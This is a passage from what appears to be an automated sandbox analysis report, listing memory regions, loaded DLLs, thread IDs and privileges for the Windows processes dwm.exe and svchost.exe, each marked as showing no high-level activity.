- |
| rpcepmap.dll | 0x7ffc533a0000 | 0x7ffc533b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ffc533c0000 | 0x7ffc5349afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #51: dwm.exe
0
0
| Information | Value |
|---|---|
| ID | #51 |
| File Name | c:\windows\system32\dwm.exe |
| Command Line | "dwm.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2d4 |
| Parent PID | 0x1cc (c:\windows\system32\winlogon.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | Window Manager\DWM-1 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
558
0x
4E0
0x
4DC
0x
4D8
0x
310
0x
308
0x
30C
0x
2FC
0x
2F8
0x
2D8
0x
834
0x
830
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000065d0830000 | 0x65d0830000 | 0x65d083ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d0840000 | 0x65d0840000 | 0x65d0846fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0850000 | 0x65d0850000 | 0x65d0863fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d0870000 | 0x65d0870000 | 0x65d08effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d08f0000 | 0x65d08f0000 | 0x65d08f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d0900000 | 0x65d0900000 | 0x65d0902fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d0910000 | 0x65d0910000 | 0x65d0911fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x65d0920000 | 0x65d09ddfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000065d09e0000 | 0x65d09e0000 | 0x65d09e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d09f0000 | 0x65d09f0000 | 0x65d09f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d0a00000 | 0x65d0a00000 | 0x65d0a04fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0a10000 | 0x65d0a10000 | 0x65d0a14fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0a20000 | 0x65d0a20000 | 0x65d0a24fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0a30000 | 0x65d0a30000 | 0x65d0a34fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0a40000 | 0x65d0a40000 | 0x65d0a44fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d0a60000 | 0x65d0a60000 | 0x65d0a66fff | Private Memory | rw |
|
|
|
- |
| dwm.exe.mui | 0x65d0a70000 | 0x65d0a71fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000065d0a80000 | 0x65d0a80000 | 0x65d0a80fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d0a90000 | 0x65d0a90000 | 0x65d0a90fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d0aa0000 | 0x65d0aa0000 | 0x65d0aa0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d0ab0000 | 0x65d0ab0000 | 0x65d0baffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d0bb0000 | 0x65d0bb0000 | 0x65d0bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0bc0000 | 0x65d0bc0000 | 0x65d0be9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0bf0000 | 0x65d0bf0000 | 0x65d0bf0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d0c00000 | 0x65d0c00000 | 0x65d0c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d0c10000 | 0x65d0c10000 | 0x65d0d97fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d0da0000 | 0x65d0da0000 | 0x65d0f20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d0f30000 | 0x65d0f30000 | 0x65d232ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d23b0000 | 0x65d23b0000 | 0x65d23b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d23c0000 | 0x65d23c0000 | 0x65d23c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d23d0000 | 0x65d23d0000 | 0x65d23d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d23e0000 | 0x65d23e0000 | 0x65d23e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d23f0000 | 0x65d23f0000 | 0x65d23f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d2400000 | 0x65d2400000 | 0x65d2400fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d2410000 | 0x65d2410000 | 0x65d2410fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d2420000 | 0x65d2420000 | 0x65d242ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x65d2430000 | 0x65d2766fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000065d2770000 | 0x65d2770000 | 0x65d27effff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d27f0000 | 0x65d27f0000 | 0x65d286ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d2870000 | 0x65d2870000 | 0x65d306ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000065d3070000 | 0x65d3070000 | 0x65d3127fff | Pagefile Backed Memory | r |
|
|
|
- |
| aero.msstyles | 0x65d3130000 | 0x65d3251fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000065d3260000 | 0x65d3260000 | 0x65d335ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d3360000 | 0x65d3360000 | 0x65d33dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d33e0000 | 0x65d33e0000 | 0x65d33f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d3400000 | 0x65d3400000 | 0x65d342ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d3430000 | 0x65d3430000 | 0x65d352ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d3530000 | 0x65d3530000 | 0x65d3530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d3540000 | 0x65d3540000 | 0x65d35bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d35c0000 | 0x65d35c0000 | 0x65d363ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d3640000 | 0x65d3640000 | 0x65d36bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d36d0000 | 0x65d36d0000 | 0x65d36d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d36e0000 | 0x65d36e0000 | 0x65d36e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d36f0000 | 0x65d36f0000 | 0x65d36f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d3700000 | 0x65d3700000 | 0x65d3700fff | Pagefile Backed Memory | r |
|
|
|
- |
| d2d1.dll.mui | 0x65d3710000 | 0x65d3751fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000065d3760000 | 0x65d3760000 | 0x65d3c51fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d3c60000 | 0x65d3c60000 | 0x65d405ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d4060000 | 0x65d4060000 | 0x65d4060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d4070000 | 0x65d4070000 | 0x65d4070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d4080000 | 0x65d4080000 | 0x65d40b8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d40c0000 | 0x65d40c0000 | 0x65d45b1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d45c0000 | 0x65d45c0000 | 0x65d45c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d45d0000 | 0x65d45d0000 | 0x65d45d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d45f0000 | 0x65d45f0000 | 0x65d45f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d4600000 | 0x65d4600000 | 0x65d4600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d4610000 | 0x65d4610000 | 0x65d4613fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d4620000 | 0x65d4620000 | 0x65d4620fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d4640000 | 0x65d4640000 | 0x65d4640fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000065d4660000 | 0x65d4660000 | 0x65d4b51fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d4b60000 | 0x65d4b60000 | 0x65d5051fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d5060000 | 0x65d5060000 | 0x65d5060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d5070000 | 0x65d5070000 | 0x65d5070fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d5090000 | 0x65d5090000 | 0x65d5090fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d50a0000 | 0x65d50a0000 | 0x65d50a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d50b0000 | 0x65d50b0000 | 0x65d50b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000065d50d0000 | 0x65d50d0000 | 0x65d50d3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d50e0000 | 0x65d50e0000 | 0x65d50e3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d5110000 | 0x65d5110000 | 0x65d530ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d5310000 | 0x65d5310000 | 0x65d531ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d5320000 | 0x65d5320000 | 0x65d532ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d5330000 | 0x65d5330000 | 0x65d533ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d53a0000 | 0x65d53a0000 | 0x65d53affff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d53b0000 | 0x65d53b0000 | 0x65d53bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d53c0000 | 0x65d53c0000 | 0x65d543ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d5690000 | 0x65d5690000 | 0x65d5693fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d56a0000 | 0x65d56a0000 | 0x65d56a3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d56b0000 | 0x65d56b0000 | 0x65d56b3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d56c0000 | 0x65d56c0000 | 0x65d58befff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d58c0000 | 0x65d58c0000 | 0x65d58cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d58d0000 | 0x65d58d0000 | 0x65d58dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000065d58e0000 | 0x65d58e0000 | 0x65d58effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000065d5910000 | 0x65d5910000 | 0x65d591ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d5930000 | 0x65d5930000 | 0x65d593ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000065d5940000 | 0x65d5940000 | 0x65d5b3efff | Pagefile Backed Memory | rw |
|
|
|
- |
| staticcache.dat | 0x65d5e40000 | 0x65d6e7ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000065d6e80000 | 0x65d6e80000 | 0x65d6efffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d6f00000 | 0x65d6f00000 | 0x65d6f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d6f40000 | 0x65d6f40000 | 0x65d6f46fff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d70e0000 | 0x65d70e0000 | 0x65d726bfff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d7270000 | 0x65d7270000 | 0x65d736ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d7370000 | 0x65d7370000 | 0x65d746ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d7470000 | 0x65d7470000 | 0x65d74effff | Private Memory | rw |
|
|
|
- |
| private_0x00000065d74f0000 | 0x65d74f0000 | 0x65d756ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff670000 | 0x7df5ff670000 | 0x7ff5ff66ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff715bd0000 | 0x7ff715bd0000 | 0x7ff715bdffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff715be0000 | 0x7ff715be0000 | 0x7ff715beffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff715bf0000 | 0x7ff715bf0000 | 0x7ff715bfffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff715c06000 | 0x7ff715c06000 | 0x7ff715c07fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715c08000 | 0x7ff715c08000 | 0x7ff715c09fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715c0a000 | 0x7ff715c0a000 | 0x7ff715c0bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715c0c000 | 0x7ff715c0c000 | 0x7ff715c0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715c0e000 | 0x7ff715c0e000 | 0x7ff715c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff715c10000 | 0x7ff715c10000 | 0x7ff715d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff715d10000 | 0x7ff715d10000 | 0x7ff715d32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff715d33000 | 0x7ff715d33000 | 0x7ff715d34fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715d35000 | 0x7ff715d35000 | 0x7ff715d36fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715d39000 | 0x7ff715d39000 | 0x7ff715d3afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715d3d000 | 0x7ff715d3d000 | 0x7ff715d3dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff715d3e000 | 0x7ff715d3e000 | 0x7ff715d3ffff | Private Memory | rw |
|
|
|
- |
| dwm.exe | 0x7ff7160d0000 | 0x7ff7160e2fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ffc4f660000 | 0x7ffc4f686fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7ffc4fe10000 | 0x7ffc50354fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffc50d80000 | 0x7ffc50d8afff | Memory Mapped File | rwx |
|
|
|
- |
| uianimation.dll | 0x7ffc51e20000 | 0x7ffc51e6afff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x7ffc51e70000 | 0x7ffc52021fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7ffc52030000 | 0x7ffc5229dfff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x7ffc522a0000 | 0x7ffc5233bfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7ffc52340000 | 0x7ffc525e2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffc525f0000 | 0x7ffc52611fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmghost.dll | 0x7ffc52620000 | 0x7ffc52635fff | Memory Mapped File | rwx |
|
|
|
- |
| ninput.dll | 0x7ffc526d0000 | 0x7ffc5272bfff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| dcomp.dll | 0x7ffc52800000 | 0x7ffc528d0fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmcore.dll | 0x7ffc528e0000 | 0x7ffc52ab3fff | Memory Mapped File | rwx |
|
|
|
- |
| udwm.dll | 0x7ffc52ac0000 | 0x7ffc52b92fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmredir.dll | 0x7ffc52ba0000 | 0x7ffc52bcbfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffc52cd0000 | 0x7ffc52d47fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 28 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #52: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #52 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x32c |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F8C
0x
F90
0x
8C0
0x
ED0
0x
F34
0x
248
0x
8AC
0x
620
0x
8D0
0x
740
0x
2FC
0x
2C4
0x
2B0
0x
8
0x
134
0x
230
0x
120
0x
3D4
0x
3B4
0x
3B0
0x
3AC
0x
394
0x
38C
0x
330
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000448a600000 | 0x448a600000 | 0x448a60ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x448a610000 | 0x448a610fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000448a620000 | 0x448a620000 | 0x448a633fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448a640000 | 0x448a640000 | 0x448a6bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448a6c0000 | 0x448a6c0000 | 0x448a6c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000448a6d0000 | 0x448a6d0000 | 0x448a6d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448a6e0000 | 0x448a6e0000 | 0x448a6e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x448a6f0000 | 0x448a7adfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000448a7b0000 | 0x448a7b0000 | 0x448a7b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448a7c0000 | 0x448a7c0000 | 0x448a7c0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000448a830000 | 0x448a830000 | 0x448a830fff | Private Memory | rw |
|
|
|
- |
| private_0x000000448a840000 | 0x448a840000 | 0x448a840fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448a850000 | 0x448a850000 | 0x448a850fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448a860000 | 0x448a860000 | 0x448a866fff | Private Memory | rw |
|
|
|
- |
| wevtapi.dll | 0x448a870000 | 0x448a8d4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000448a8e0000 | 0x448a8e0000 | 0x448a8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448a900000 | 0x448a900000 | 0x448a9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448aa00000 | 0x448aa00000 | 0x448ab87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448ab90000 | 0x448ab90000 | 0x448abaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448abb0000 | 0x448abb0000 | 0x448abcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448abd0000 | 0x448abd0000 | 0x448abd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448abe0000 | 0x448abe0000 | 0x448abe6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000448abf0000 | 0x448abf0000 | 0x448abf0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000448ac00000 | 0x448ac00000 | 0x448acfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448ad00000 | 0x448ad00000 | 0x448ae80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000448ae90000 | 0x448ae90000 | 0x448af4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000448af50000 | 0x448af50000 | 0x448b04ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b050000 | 0x448b050000 | 0x448b0cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b0d0000 | 0x448b0d0000 | 0x448b14ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b150000 | 0x448b150000 | 0x448b24ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b250000 | 0x448b250000 | 0x448b34ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b350000 | 0x448b350000 | 0x448b3cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b3d0000 | 0x448b3d0000 | 0x448b3d6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b3e0000 | 0x448b3e0000 | 0x448b3e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000448b3f0000 | 0x448b3f0000 | 0x448b3f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000448b400000 | 0x448b400000 | 0x448b4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b500000 | 0x448b500000 | 0x448b57ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b580000 | 0x448b580000 | 0x448b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b600000 | 0x448b600000 | 0x448b67ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b680000 | 0x448b680000 | 0x448b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b700000 | 0x448b700000 | 0x448b7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b800000 | 0x448b800000 | 0x448b8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448b900000 | 0x448b900000 | 0x448b9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448ba00000 | 0x448ba00000 | 0x448bafffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x448bb00000 | 0x448be36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000448be40000 | 0x448be40000 | 0x448bf3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c040000 | 0x448c040000 | 0x448c13ffff | Private Memory | rw |
|
|
|
- |
| winlogon.exe | 0x448c140000 | 0x448c1d2fff | Memory Mapped File | r |
|
|
|
- |
| pcaevts.dll | 0x448c1e0000 | 0x448c1e4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000448c200000 | 0x448c200000 | 0x448c2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c300000 | 0x448c300000 | 0x448c3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c400000 | 0x448c400000 | 0x448c4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c500000 | 0x448c500000 | 0x448c5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c600000 | 0x448c600000 | 0x448c6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c700000 | 0x448c700000 | 0x448c7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c800000 | 0x448c800000 | 0x448c8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448c900000 | 0x448c900000 | 0x448c9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448ca00000 | 0x448ca00000 | 0x448cafffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448cb00000 | 0x448cb00000 | 0x448cb7ffff | Private Memory | rw |
|
|
|
- |
| services.exe | 0x448cb80000 | 0x448cbeffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000448cc00000 | 0x448cc00000 | 0x448ccfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448cd00000 | 0x448cd00000 | 0x448cdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448ce00000 | 0x448ce00000 | 0x448cefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448cf00000 | 0x448cf00000 | 0x448cffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448d000000 | 0x448d000000 | 0x448d0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448d100000 | 0x448d100000 | 0x448d17ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448d200000 | 0x448d200000 | 0x448d2fffff | Private Memory | rw |
|
|
|
- |
